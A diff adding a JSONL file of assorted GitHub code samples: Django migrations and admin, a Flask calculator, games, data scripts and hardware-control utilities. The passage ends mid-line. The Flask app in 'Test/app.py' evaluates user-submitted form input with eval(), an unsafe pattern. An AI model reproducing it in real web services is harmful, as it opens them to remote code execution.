diff --git "a/796.jsonl" "b/796.jsonl" new file mode 100644--- /dev/null +++ "b/796.jsonl" @@ -0,0 +1,150 @@ +{"seq_id":"30202742959","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('lite', '0030_auto_20180423_1121'),\n ('ppt', '0003_auto_20180423_1128'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='pptteam',\n options={'ordering': ['-serial'], 'verbose_name': '\\u56e2\\u961f', 'verbose_name_plural': '\\u56e2\\u961f'},\n ),\n migrations.AlterModelOptions(\n name='pptteamuser',\n options={'ordering': ['-serial'], 'verbose_name': '\\u6210\\u5458', 'verbose_name_plural': '\\u6210\\u5458'},\n ),\n migrations.AddField(\n model_name='pptfile',\n name='upload_user',\n field=models.ForeignKey(related_name='upload_user', verbose_name='\\u4e0a\\u4f20\\u8005', blank=True, to='lite.User', null=True),\n ),\n ]\n","repo_name":"bushitan/live_server","sub_path":"ppt/migrations/0004_auto_20180423_1225.py","file_name":"0004_auto_20180423_1225.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"18560178125","text":"import urllib2\nfrom haversine import haversine\nimport json\nimport re\n\nWORDS = [\"EVENTS\", \"ROAD\"]\n\n\ndef getPromet(lat, lon):\n # -------------------------------------------------------\n # DOBI lokacijo v obliki lat pa lon\n # VRNE bližnje dogodke kot array da jasper direkt pove\n # Link do navodil https://github.com/zejn/arsoapi\n # ---------------------------------------------------------*/\n promet = []\n range = 20 #km\n currentLocation = (lat, lon)\n link = \"http://janliber.spletniki.si/\"\n webPage = urllib2.urlopen(link)\n content = webPage.read()\n\n\n events = json.loads(content.decode(\"utf-8\"))\n for event in events:\n eventLocation = (event['lat'], event['lon'])\n distance = haversine(currentLocation, eventLocation)\n if(distance < range):\n promet.append(event[\"description\"])\n\n\n return promet\n\n\ndef handle(text, mic):\n \"\"\"\n Responds to user-input, typically speech text, by telling the events on the road.\n Arguments:\n text -- user-input, typically transcribed speech\n mic -- used to interact with the user (for both input and output)\n \"\"\"\n\n lat=46.4221890\n lon=14.9262910\n events = getPromet(lat, lon)\n\n for event in events:\n mic.say(event)\n\n\ndef isValid(text):\n \"\"\"\n Returns True if the input is related to events.\n Arguments:\n text -- user-input, typically transcribed speech\n \"\"\"\n return bool(re.search(r'\\bevents on the road\\b', text, re.IGNORECASE))\n","repo_name":"xuhui/CarDataReader","sub_path":"Events.py","file_name":"Events.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"70948752800","text":"# django\n\nfrom base.tests import BaseApiTestCase\n\n\nclass ListingReviewCrudTestCase(BaseApiTestCase):\n def setUp(self):\n super().setUp()\n self.listing = self.create_listing().json()\n self.review = self.create_listing_review(\n {\"listing\": self.listing.get(\"id\")}\n ).json()\n\n def test_listing_review_create(self):\n data = {\n \"reviewer\": self.user.get(\"id\"),\n \"listing\": self.listing.get(\"id\"),\n \"score\": 3,\n \"description\": \"test\",\n }\n response = self.create_listing_review(data)\n response_data = response.json()\n self.assertEqual(response.status_code, 
201)\n self.assertEqual(response_data.get(\"reviewer\"), self.user.get(\"id\"))\n self.assertEqual(response_data.get(\"listing\"), self.listing.get(\"id\"))\n self.assertEqual(response_data.get(\"score\"), 3)\n self.assertEqual(response_data.get(\"description\"), \"test\")\n\n def test_listing_review_update(self):\n response = self.client.put(\n f\"/api/reviews/{self.review.get('id')}/\",\n {\n \"reviewer\": self.user.get(\"id\"),\n \"listing\": self.listing.get(\"id\"),\n \"score\": 1,\n \"description\": \"abc\",\n },\n )\n data = response.json()\n self.assertEqual(response.status_code, 200)\n self.assertEqual(data.get(\"reviewer\"), self.user.get(\"id\"))\n self.assertEqual(data.get(\"listing\"), self.listing.get(\"id\"))\n self.assertEqual(data.get(\"score\"), 1)\n self.assertEqual(data.get(\"description\"), \"abc\")\n\n def test_listing_review_detail(self):\n response = self.client.get(f\"/api/reviews/{self.review.get('id')}/\")\n data = response.json()\n self.assertIsNotNone(data.get(\"reviewer\"))\n self.assertIsNotNone(data.get(\"listing\"))\n self.assertIsNotNone(data.get(\"score\"))\n self.assertIsNotNone(data.get(\"description\"))\n\n def test_listing_review_delete(self):\n response = self.client.delete(f\"/api/reviews/{self.review.get('id')}/\")\n self.assertEqual(response.status_code, 204)\n\n def test_listing_review_list(self):\n for _ in range(10):\n self.create_listing_review()\n\n response = self.client.get(\"/api/reviews/\")\n self.assertEqual(response.status_code, 200)\n self.assertEqual(len(response.json()), 11)\n","repo_name":"KnowYourselves/rentool-backend","sub_path":"listings/tests/test_listing_review_crud.py","file_name":"test_listing_review_crud.py","file_ext":"py","file_size_in_byte":2415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"30189567219","text":"from board import Board, drawBoard, swapColour\r\nfrom ai import AI\r\n\r\ndef getUserInput(board):\r\n column = int(input(\"Choose slot: \")) - 1\r\n while not (0 <= column < Board.BOARDWIDTH) or board._boardFreeSlots[column] == Board.BOARDHEIGHT:\r\n print(\"Please choose a valid slot.\")\r\n column = int(input(\"Choose slot: \")) - 1\r\n print()\r\n return column\r\n\r\ndef gameLoop():\r\n\r\n playerColour = \"O\"\r\n aiColour = \"X\"\r\n currentColour = playerColour\r\n\r\n board = Board()\r\n ai = AI(aiColour, playerColour, board)\r\n win = False\r\n\r\n while not win:\r\n drawBoard(board)\r\n\r\n if currentColour == playerColour:\r\n print(\"Your turn!\")\r\n userInput = getUserInput(board)\r\n tokenPosition = board.drop(userInput, currentColour)\r\n elif currentColour == aiColour:\r\n print(\"AI is thinking!\")\r\n tokenPosition = ai.makeMove()\r\n\r\n if board.checkWinLocal(*tokenPosition, currentColour):\r\n win = True\r\n if currentColour == playerColour:\r\n print(\"----- You Win! -----\")\r\n elif currentColour == aiColour:\r\n print(\"----- AI Wins! 
-----\")\r\n drawBoard(board)\r\n\r\n ai.updateInternalBoard()\r\n currentColour = swapColour(currentColour)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n gameLoop()\r\n","repo_name":"benmandrew/Connect4AI","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"41762746232","text":"import sys\nimport textwrap\nimport logging\n\nif __name__ == \"__main__\":\n sys.path.insert(0, \".\")\n\nfrom neubot import utils_modules\n\nMODULES = {\n \"CA\" : \"neubot.net.CA\",\n \"agent\" : \"neubot.agent\",\n \"api.client\" : \"neubot.api.client\",\n \"database\" : \"neubot.database.main\",\n \"bittorrent\" : \"neubot.bittorrent\",\n \"http.client\" : \"neubot.http.client\",\n \"http.server\" : \"neubot.http.server\",\n 'notifier' : 'neubot.notifier',\n \"privacy\" : \"neubot.privacy\",\n \"raw\" : \"neubot.raw\",\n \"server\" : \"neubot.server\",\n \"speedtest\" : \"neubot.speedtest.client\",\n \"speedtest.client\" : \"neubot.speedtest.client\",\n \"speedtest.server\" : \"neubot.speedtest.server\",\n \"stream\" : \"neubot.net.stream\",\n}\n\n#\n# XXX Good morning, this is an hack: py2exe does not\n# load modules that are not referenced and we're very\n# lazy in this file. As a workaround let's load all\n# modules when we're in windows and we are not frozen\n# so we should reference all modules when py2exe is\n# inspecting us.\n#\nif sys.platform == 'win32' and not hasattr(sys, 'frozen'):\n #import neubot.net.CA # posix only\n import neubot.agent\n import neubot.api.client\n import neubot.database.main\n import neubot.bittorrent\n import neubot.http.client\n import neubot.http.server\n import neubot.privacy\n #import neubot.server # requires PyGeoIP\n import neubot.speedtest.client\n import neubot.speedtest.client\n import neubot.speedtest.server\n import neubot.net.stream\n\ndef run(argv):\n\n # /usr/bin/neubot module ...\n del argv[0]\n module = argv[0]\n\n if module == \"help\":\n sys.stdout.write(\"Neubot help -- prints available commands\\n\")\n\n commands = \" \".join(sorted(MODULES.keys()))\n lines = textwrap.wrap(commands, 60)\n sys.stdout.write(\"Commands: \" + lines[0] + \"\\n\")\n for s in lines[1:]:\n sys.stdout.write(\" \" + s + \"\\n\")\n\n sys.stdout.write(\"Try `neubot CMD --help` for more help on CMD.\\n\")\n sys.exit(0)\n\n utils_modules.modprobe(None, \"load_subcommand\", MODULES)\n\n if not module in MODULES:\n sys.stderr.write(\"Invalid module: %s\\n\" % module)\n sys.stderr.write(\"Try `neubot help` to list the available modules\\n\")\n sys.exit(1)\n\n # Dinamically load the selected module's main() at runtime\n module = MODULES[module]\n __import__(module)\n MAIN = sys.modules[module].main\n\n # neubot module ...\n argv[0] = \"neubot \" + argv[0]\n\n try:\n MAIN(argv)\n except KeyboardInterrupt:\n pass\n except SystemExit:\n raise\n except:\n logging.error('Exception', exc_info=1)\n sys.exit(1)\n sys.exit(0)\n\nif __name__ == \"__main__\":\n run(sys.argv)\n","repo_name":"neubot/neubot","sub_path":"neubot/main/module.py","file_name":"module.py","file_ext":"py","file_size_in_byte":2901,"program_lang":"python","lang":"en","doc_type":"code","stars":58,"dataset":"github-code","pt":"51"} +{"seq_id":"42487757765","text":"import pytesseract \nfrom pytesseract import Output\nimport cv2 \nimport common\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math\nimport main.helper as helper\nimport config\nimport pathlib\nimport find_corners as 
find_corners\n\n#img = cv2.imread('coffee_sample.png')\n\n\n# pic = 'hello.jpeg'\n# img = cv2.imread(pic)\nfiles = [f for f in pathlib.Path(\"will_customs\").iterdir()]\niter = 1\nfor file in files:\n #config.img = cv2.imread(str(file))\n img = cv2.imread(str(file))\n img = cv2.resize(img, (900, 900), cv2.INTER_AREA)\n config.img = img\n\n full_height,full_width,_ = img.shape\n \n #img = cv2.resize(img, (1200, 1200))\n # imgGray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n hImg, wImg, _ = img.shape\n\n ave_value = (np.max(img) + np.min(img))/2\n\n contrast = (img > ave_value) * 255\n\n contrast = contrast.astype(\"uint8\")\n\n #plt.savefig('output2.png')\n custom_config = '--psm 1 --oem 3 -c tessedit_char_blacklist=0123456789'\n full_width = 0\n full_height = 0\n print(str(full_width) + \", \", str(full_height))\n x_top = 0\n x_bot = 0\n y_top = 0\n y_bot = 0\n\n img_string = 'image'\n pts = np.zeros((4, 2), dtype = \"float32\")\n\n pts = find_corners.find_corners(img)\n img_wrect = img.copy()\n img_wrect = helper.draw_rect(img, pts)\n\n\n cv2.imshow(img_string, img_wrect)\n\n helper.drag_corners(img, img_wrect, img_string, pts)\n\n #helper.click_corners(img, img_string, full_width, full_height) ### CORNERS\n \n while (True):\n k = cv2.waitKey(10)\n if k == 32:\n break\n\n print(\"Rect Done [X]\")\n\n \n #pts = np.asarray(config.global_coord, dtype = \"float32\")\n warped = helper.four_point_transform(img, pts) # Their code\n\n warp_h, warp_w, _ = warped.shape\n\n # cv2.imshow(\"warp\", warped)\n # print(\"warp dimensions: \", warped.shape)\n # print(\"(B)\")\n # print(\"[Press [space] to continue]\")\n\n # while (True):\n # k = cv2.waitKey(10)\n # if k == 32:\n # break\n\n print(\"Loading letter recognition...\")\n\n wi = math.ceil(warp_w/15)\n hi = math.ceil(warp_h/15)\n print(str(wi) + \", \", str(hi))\n\n charar = np.chararray((15, 15))\n print(\"warp dimensions: \", warped.shape)\n cp_warped = warped.copy()\n max_dim = max(wi, hi)\n cp_warped = cv2.resize(cp_warped, (max_dim*15, max_dim*15))\n cv2.imshow(\"warp\", cp_warped)\n print(\"warp dimensions: \", cp_warped.shape)\n print(\"(B)\")\n print(\"[Press [space] to continue]\")\n\n while (True):\n k = cv2.waitKey(10)\n if k == 32:\n cv2.destroyWindow(\"warp\")\n break\n\n cv2.imwrite(\"./error_warp/w\" + str(iter) + \".jpg\", cp_warped)\n config.click_incr = 0\n config.abs_incr = 0\n config.done = False\n iter = iter + 1\n #common.save_img(cp_warped, 'warped.jpg')\n","repo_name":"kwwangkw/scrabble-solver","sub_path":"Training_Data/warp_lots.py","file_name":"warp_lots.py","file_ext":"py","file_size_in_byte":2813,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"13406396371","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import api, fields, models, tools\n\n\nclass Goal(models.Model):\n _name = 'secret.secret'\n _description = 'Secrets'\n\n name = fields.Char(\n string=\"Nom court\",\n compute=\"_name_short\")\n secret = fields.Text(\n string=\"Secret\"\n )\n ipaddress = fields.Char(\n string=\"Adresse ip\"\n )\n\n\n @api.depends('secret')\n def _name_short(self):\n for record in self:\n if record.secret:\n record.name = record.secret[:50] + '...'\n else:\n record.name = False","repo_name":"yterrettaz/secret","sub_path":"local-src/secret/models/secrets.py","file_name":"secrets.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"14319323192","text":"from flask import Flask, 
render_template, request\r\nimport os\r\n\r\napp = Flask(__name__)\r\n\r\ntemplate_dir = os.path.abspath('templates')\r\napp.template_folder = template_dir\r\n\r\n@app.route('/')\r\ndef home():\r\n return render_template('index.html')\r\n\r\n@app.route('/calculate', methods=['POST'])\r\ndef calculate():\r\n expression = request.form['expression']\r\n result = eval(expression)+1\r\n return str(result)\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True)\r\n","repo_name":"tydantang/RO_Calculator","sub_path":"Test/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"14578660635","text":"import pandas as pd\nfrom functools import reduce\n\"\"\"\n\tThis file aggregates the provincial dfs web scraped from provincial_data_web_importer.\n\tIt then finds the total populations for the main geographical areas of canada for each year that \n\tis common among all provincial data.\n\"\"\"\n#import the data\ndf_list = []\ndef df_creator(province):\n csv_name = r'../data/'+'population_by_year_df_'+province+'.csv'\n df = pd.read_csv(csv_name)\n df_list.append(df)\n return df\n\ndf_Alberta = df_creator('AB')\ndf_British_Columbia = df_creator('BC')\ndf_Manitoba = df_creator('MB')\ndf_New_Brunswick = df_creator('NB')\ndf_Newfoundland_and_Labrador = df_creator('NL')\ndf_Northwest_Territories = df_creator('NT')\ndf_Nova_Scotia = df_creator('NS')\ndf_Nunavut = df_creator('NU')\ndf_Ontario = df_creator('ON')\ndf_Prince_Edward_Island = df_creator('PE')\ndf_Quebec = df_creator('QC')\ndf_Saskatchewan = df_creator('SK')\ndf_Yukon = df_creator('YT')\n\n\n# =============================================================================\n# Join the data on common years\n# =============================================================================\nyear_list=[df['year'] for df in df_list]\ncommon_years = sorted(list(set(year_list[0]).intersection(*year_list)))\ndf_list = [df[df['year'].isin(common_years)] for df in df_list]\ncommon_years_df = reduce(lambda left,right: pd.merge(left,right,on='year'), df_list)\n\n#add total populations for each geography group\ndef total_population(df):\n df['canada'] = df.iloc[:, 1:13].sum(axis=1)\n df['maritimes'] = df[['NB','NS','PE']].sum(axis=1)\n df['western_canada'] = df[['BC','AB','SK','MB']].sum(axis=1)\n df['eastern_canada'] = df[['NB','NL','NS','ON','PE','QC']].sum(axis=1)\n df['prairies'] = df[['MB','SK','AB']].sum(axis=1)\n return df\ncommon_years_df = total_population(common_years_df )\n\ncommon_years_df.to_csv(r'../data/provinces_common_years_population.csv', index = False)\n\n\n\n\n\n\n\n\n","repo_name":"marcosmcz/math6627_coursework","sub_path":"project3/data_cleaning/province_df_agregator.py","file_name":"province_df_agregator.py","file_ext":"py","file_size_in_byte":1925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"34679475812","text":"from maggma.builders.map_builder import MapBuilder\nfrom maggma.stores import MongoStore\nfrom typing import Tuple\nfrom emmet.core.mobility.migrationgraph import MigrationGraphDoc\nfrom emmet.builders.utils import get_hop_cutoff\nfrom pymatgen.apps.battery.insertion_battery import InsertionElectrode\nfrom pymatgen.analysis.diffusion.neb.full_path_mapper import MigrationGraph\nfrom emmet.core.utils import jsanitize\n\n\nclass MigrationGraphBuilder(MapBuilder):\n def __init__(\n self,\n insertion_electrode: MongoStore,\n migration_graph: 
MongoStore,\n algorithm: str = \"hops_based\",\n min_hop_distance: float = 1,\n max_hop_distance: float = 7,\n populate_sc_fields: bool = True,\n min_length_sc: float = 8,\n minmax_num_atoms: Tuple[int, int] = (80, 120),\n ltol: float = 0.2,\n stol: float = 0.3,\n angle_tol: float = 5,\n **kwargs,\n ):\n self.insertion_electrode = insertion_electrode\n self.migration_graph = migration_graph\n self.algorithm = algorithm\n self.min_hop_distance = min_hop_distance\n self.max_hop_distance = max_hop_distance\n self.populate_sc_fields = populate_sc_fields\n self.min_length_sc = min_length_sc\n self.minmax_num_atoms = minmax_num_atoms\n self.ltol = ltol\n self.stol = stol\n self.angle_tol = angle_tol\n super().__init__(source=insertion_electrode, target=migration_graph, **kwargs)\n self.connect()\n\n def unary_function(self, item):\n warnings = []\n\n # get entries and info from insertion electrode\n ie = InsertionElectrode.from_dict(item[\"electrode_object\"])\n entries = ie.get_all_entries()\n wi_entry = ie.working_ion_entry\n\n # get migration graph structure\n structs = MigrationGraph.get_structure_from_entries(entries, wi_entry)\n if len(structs) == 0:\n warnings.append(\"cannot generate migration graph from entries\")\n d = None\n else:\n if len(structs) > 1:\n warnings.append(\n f\"migration graph ambiguous: {len(structs)} possible options\"\n )\n # get hop cutoff distance\n d = get_hop_cutoff(\n migration_graph_struct=structs[0],\n mobile_specie=wi_entry.composition.chemical_system,\n algorithm=self.algorithm,\n min_hop_distance=self.min_hop_distance,\n max_hop_distance=self.max_hop_distance,\n )\n\n # get migration graph doc\n try:\n mg_doc = MigrationGraphDoc.from_entries_and_distance(\n battery_id=item[\"battery_id\"],\n grouped_entries=entries,\n working_ion_entry=wi_entry,\n hop_cutoff=d,\n populate_sc_fields=self.populate_sc_fields,\n min_length_sc=self.min_length_sc,\n minmax_num_atoms=self.minmax_num_atoms,\n ltol=self.ltol,\n stol=self.stol,\n angle_tol=self.angle_tol,\n warnings=warnings,\n )\n except Exception as e:\n mg_doc = MigrationGraphDoc(\n battery_id=item[\"battery_id\"],\n entries_for_generation=entries,\n working_ion_entry=wi_entry,\n hop_cutoff=d,\n migration_graph=None,\n populate_sc_fields=self.populate_sc_fields,\n min_length_sc=self.min_length_sc,\n minmax_num_atoms=self.minmax_num_atoms,\n ltol=self.ltol,\n stol=self.stol,\n angle_tol=self.angle_tol,\n warnings=warnings,\n deprecated=True,\n )\n self.logger.error(f\"error getting MigrationGraphDoc: {e}\")\n return jsanitize(mg_doc)\n\n return jsanitize(mg_doc.model_dump())\n","repo_name":"materialsproject/emmet","sub_path":"emmet-builders/emmet/builders/mobility/migration_graph.py","file_name":"migration_graph.py","file_ext":"py","file_size_in_byte":3923,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"51"} +{"seq_id":"73913712479","text":"# -*- encoding: utf-8 -*-\nfrom typing import Any\n\n\ndef sequential_search(key: Any, array: list) -> int:\n for index, value in enumerate(array):\n if value == key:\n return index\n raise KeyError\n\n\nif __name__ == \"__main__\":\n array = [1, 5, 4, 3, 12, 14, 2, 7, 9]\n key = 13\n try:\n index = sequential_search(key, array)\n print(f\"Key({key}) index is {index}\")\n except KeyError:\n print(\"Not 
found\")\n","repo_name":"Codejune/algorithm","sub_path":"method/sequential-search/sequential_search.py","file_name":"sequential_search.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"72700539359","text":"#!/usr/bin/env python\n\nimport sys\nimport curses\nfrom curses import wrapper\nimport serial # pip install pyserial\n\nkeylabels = {\n chr(curses.KEY_RIGHT): 'Right',\n chr(curses.KEY_LEFT): 'Left',\n chr(curses.KEY_UP): 'Up',\n chr(curses.KEY_DOWN): 'Down',\n '\\n': 'Enter'\n}\n\nkeys = {\n 'w': 'C00',\n 'q': 'C01',\n '1': 'C05',\n '2': 'C06',\n 's': 'C1C',\n 'a': 'C1D',\n chr(curses.KEY_RIGHT): 'C3A',\n chr(curses.KEY_LEFT): 'C3B',\n chr(curses.KEY_UP): 'C3C',\n chr(curses.KEY_DOWN): 'C3D',\n '\\n': 'C3F',\n 'x': 'x'\n}\n\ncommands = {\n 'C00': 'Power ON',\n 'C01': 'Power OFF',\n 'C05': 'Computer 1',\n 'C06': 'Computer 2',\n 'C1C': 'Menu ON',\n 'C1D': 'Menu OFF',\n 'C3A': 'Pointer right',\n 'C3B': 'Pointer left',\n 'C3C': 'Pointer up',\n 'C3D': 'Pointer down',\n 'C3F': 'Enter',\n 'x': 'Exit'\n}\n\ndef usage():\n key_descriptions = {chr(getattr(curses, x)): x[4:]\n for x in dir(curses) if x.startswith('KEY_')}\n ret = ''\n\n for known_key, command in keys.items():\n key_description = None\n if known_key in keylabels.keys():\n key_description = keylabels.get(known_key)\n if key_description is None:\n key_description = known_key if str(known_key).isalnum() else repr(known_key)\n cmd_description = commands.get(command)\n ret += f'{key_description}: {cmd_description}'\n if ret:\n ret += '\\n'\n return ret\n\ndef main(scr):\n char = '\\0'\n\n if len(sys.argv) != 2:\n print(\"usage: {} serialdevice\".format(sys.argv[0]))\n quit(1)\n\n try:\n s = serial.Serial(sys.argv[1], baudrate=19200)\n except serial.serialutil.SerialException as err:\n print(\"Error while trying to open device {}: {}\".format(sys.argv[1], err))\n quit(1)\n\n curses.noecho()\n\n while True:\n scr.clear()\n scr.addstr(0, 0, 'Last key: ' + str(ord(char)) +\n '\\n\\n' + usage())\n char = chr(scr.getch())\n if char == 'x':\n curses.endwin()\n quit(0)\n else:\n command = keys.get(char)\n if command:\n s.write(command.encode() + b'\\r\\n')\n\nif __name__ == \"__main__\":\n wrapper(main)\n","repo_name":"hakierspejs/projektor","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"32799701244","text":"import logging, sys, time, cv2, ffmpeg, numpy\n\nlogger = logging.getLogger(\"Writer\")\nlogger.setLevel(\"INFO\")\nformatter = logging.Formatter(\"%(asctime)s %(levelname)-8s %(module)s %(message)s\")\nhandler = logging.StreamHandler(sys.stdout)\nhandler.setFormatter(formatter)\nlogger.addHandler(handler)\nvideoCapture = cv2.VideoCapture('/home/servadmin/Downloads/motion-11-55-41.avi')\nprocess = (\n ffmpeg\n .input('pipe:', framerate='{}'.format(videoCapture.get(cv2.CAP_PROP_FPS)), format='rawvideo', pix_fmt='bgr24', s='{}x{}'.format(int(videoCapture.get(cv2.CAP_PROP_FRAME_WIDTH)), int(videoCapture.get(cv2.CAP_PROP_FRAME_HEIGHT))))\n .output('output/out.mp4', vcodec='h264_v4l2m2m', pix_fmt='nv21', **{'b:v': 2000000})\n .overwrite_output()\n .run_async(pipe_stdin=True)\n)\nlastFrame = False\nframes = 0\nstart = time.time()\nwhile not lastFrame:\n ret, image = videoCapture.read()\n if ret:\n process.stdin.write(\n image\n .astype(numpy.uint8)\n .tobytes()\n ) \n frames += 1\n else:\n 
lastFrame = True\nelapsed = time.time() - start\nlogger.info(\"%d frames\" % frames)\nlogger.info(\"%4.1f FPS, elapsed time: %4.2f seconds\" % (frames / elapsed, elapsed))\ndel videoCapture\n\n","repo_name":"BhavyanshM/MapSense","sub_path":"Python/Scripts/log_h264_mp4.py","file_name":"log_h264_mp4.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"43444687603","text":"### Numpy ###\n\n# define an array\nimport numpy\nmylist = [1, 2, 3]\nmyarray = numpy.array(mylist)\nprint(myarray)\nprint(myarray.shape)\n\n# access values\nimport numpy\nmylist = [[1, 2, 3], [3, 4, 5]]\nmyarray = numpy.array(mylist)\nprint(myarray)\nprint(myarray.shape)\nprint('First row: {}'.format(myarray[0]))\nprint('Last row: {}'.format(myarray[-1]))\nprint('Specific row and col: {}'.format(myarray[0, 2]))\nprint('Whole col: {}'.format(myarray[:, 2]))\n\n\n# arithmetic\nimport numpy\nmyarray1 = numpy.array([2, 2, 2])\nmyarray2 = numpy.array([3, 3, 3])\nprint('Addition: {}'.format(myarray1 + myarray2))\nprint('Multiplication: {}'.format(myarray1 * myarray2))\n\n\n### Matplotlib ###\n# basic line plot\nimport matplotlib.pyplot as plt\nimport numpy\nmyarray = numpy.array([1, 2, 3])\nplt.plot(myarray)\nplt.xlabel('some x axis')\nplt.ylabel('some y axis')\n#plt.show()\n\n# basic scatter plot\nimport matplotlib.pyplot as plt\nimport numpy\nx = numpy.array([1, 2, 3])\ny = numpy.array([2, 4, 6])\nplt.scatter(x,y)\nplt.xlabel('some x axis')\nplt.ylabel('some y axis')\n#plt.show()\n\n\n### Pandas ###\n# series\nimport numpy\nimport pandas\nmyarray = numpy.array([1, 2, 3])\nrownames = ['a', 'b', 'c']\nmyseries = pandas.Series(myarray, index=rownames)\nprint(myseries)\n\n# dataframe\nimport numpy\nimport pandas\nmyarray = numpy.array([[1, 2, 3], [4, 5, 6]])\nrownames = ['a', 'b']\ncolnames = ['one', 'two', 'three']\nmydataframe = pandas.DataFrame(myarray, index=rownames, columns=colnames)\nprint(mydataframe)\n\nprint(\"method 1:\")\nprint('one column: {}'.format(mydataframe['one']))\nprint(\"method 2:\")\nprint('one column: {}'.format(mydataframe.one))\n\n","repo_name":"phuongdps/machinelearning","sub_path":"examples/libraries.py","file_name":"libraries.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"32490792399","text":"from django.contrib import admin\nfrom games.models import Category, Game\n# Register your models here.\n\nclass GameInline(admin.TabularInline):\n model = Game\n@admin.register(Category)\nclass CategoryAdmin(admin.ModelAdmin):\n list_display = ('title', 'view_game_link', 'show_middle_price')\n inlines = [GameInline,]\n\n @admin.display(description='middle_price')\n def show_middle_price(self, obj): # выводит среднюю стоимость по каждой категории \n prices = 0\n print('first one')\n games = obj.game_set.all()\n \n for game in games:\n prices += game.price\n middle_price = prices/len(games) \n \n return f\"{middle_price: .2f} $\"\n\n\n @admin.display(description=\"games\")\n def view_game_link(self, obj):\n from django.utils.html import format_html\n from django.urls import reverse\n from django.utils.http import urlencode\n\n count = obj.game_set.count()\n url = (\n reverse('admin:games_game_changelist')\n + '?'\n + urlencode({'category_id': f'{obj.id}'})\n )\n return format_html('{} Games', url, count )\n\n@admin.register(Game)\nclass GameAdmin(admin.ModelAdmin):\n date_hierarchy = 'release_date_at'\n 
list_editable = ('release_date_at',)\n list_filter = ('category',)\n search_fields = ('category__title', 'title')\n readonly_fields = ('img_tag',)\n actions = ('make_inactive', 'export_as_json','export_as_csv')\n list_display = (\n 'title',\n 'release_date_at',\n 'show_pretty_price',\n 'img_preview',\n 'get_link',\n \n )\n\n @admin.display(description=\"custom price\")\n def show_pretty_price(self, obj):\n return f'$ {obj.price}'\n \n @admin.display(description=\"game image\")\n def img_preview(self, obj):\n from django.utils.html import mark_safe\n\n return mark_safe(\n f''\n )\n \n @admin.display(description=\"game image\")\n def img_tag(self, obj):\n from django.utils.html import mark_safe\n\n return mark_safe(\n f''\n )\n \n @admin.display(description='game link')\n def get_link(self, obj):\n from django.utils.html import mark_safe\n return mark_safe(\n f'Search'\n )\n \n @admin.action(description='перевести в неактивное состояние')\n def make_inactive(self, request, queryset):\n queryset.update(is_active=False)\n \n @admin.action(description=\"Скачать Json\")\n def export_as_json(self, request, queryset):\n from django.core import serializers\n from django.http import FileResponse\n import io\n from datetime import datetime\n response = FileResponse(\n io.BytesIO(serializers.serialize(\"json\", queryset).encode(\"utf-8\")),\n as_attachment=True,\n filename=f\"log-{datetime.now()}.json\",\n )\n return response\n \n @admin.action(description=\"Скачать CSV\")# скачать как csv \n def export_as_csv(self,request,queryset):\n import csv\n from django.http import HttpResponse\n meta = self.model._meta\n field_names = [field.name for field in meta.fields]\n\n response = HttpResponse(content_type='text/csv')\n response['Content-Disposition'] = 'attachment; filename={}.csv'.format(meta)\n writer = csv.writer(response)\n\n writer.writerow(field_names)\n for obj in queryset:\n row = writer.writerow([getattr(obj, field) for field in field_names])\n \n return response","repo_name":"MikhailPrizba/tms_homework","sub_path":"homework25/game_shop/games/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":3857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"9535758104","text":"import pygame\n\nclass Fenetre:\n def __init__(self,taille=[800,800]):\n \"\"\"Crée une fenêtre et ses caractérisque\n \"\"\"\n pygame.init()\n self.taille=taille\n self.nom=\"Othello\"\n self.ecran = pygame.display.set_mode(self.taille)\n self.icon = pygame.image.load(\"icon.png\")\n pygame.display.set_icon(self.icon)\n pygame.display.set_caption(self.nom)\n self.ouverte=True\n\n def verifier(self):\n \"\"\"Verifie si la fenetre est ouverte.\"\"\"\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.ouverte=False\n if event.type == KEYDOWN:\n if event.key == K_ESCAPE:\n self.ouverte=False\n","repo_name":"MarcPartensky/Python-Games","sub_path":"Othello/Groupe/fenetre.py","file_name":"fenetre.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"fr","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"} +{"seq_id":"2713086891","text":"\nimport pandas as pd\n\n# pipenv install dash\n\n\ndf = 